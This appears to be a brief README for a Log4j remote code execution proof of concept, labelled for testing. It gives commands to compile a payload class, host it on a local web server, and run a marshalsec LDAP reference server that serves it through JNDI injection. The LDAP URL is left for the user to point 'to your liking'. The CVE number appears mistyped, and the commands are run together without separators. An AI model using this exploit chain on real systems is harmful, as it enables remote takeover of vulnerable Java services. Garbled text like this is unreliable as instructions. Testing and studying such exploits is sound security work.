
PoC RCE Log4j CVE-2021-4428 para pruebas
Compile Log4jRCE.java and move the .class file to a web server (e.g., local PHP)
cd src/main/javajavac Log4jRCE.javaphp -S 127.0.0.1:8888Start LDAP Server
git clone [email protected]:Grupo-Kapa-7/marshalsec.gitcd marshalsecmvn clean package -DskipTestsjava -cp target/marshalsec-0.0.3-SNAPSHOT-GK7Threats-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"To test the PoC, modify the file src/main/java/log4j.java and change the LDAP server URL to your liking.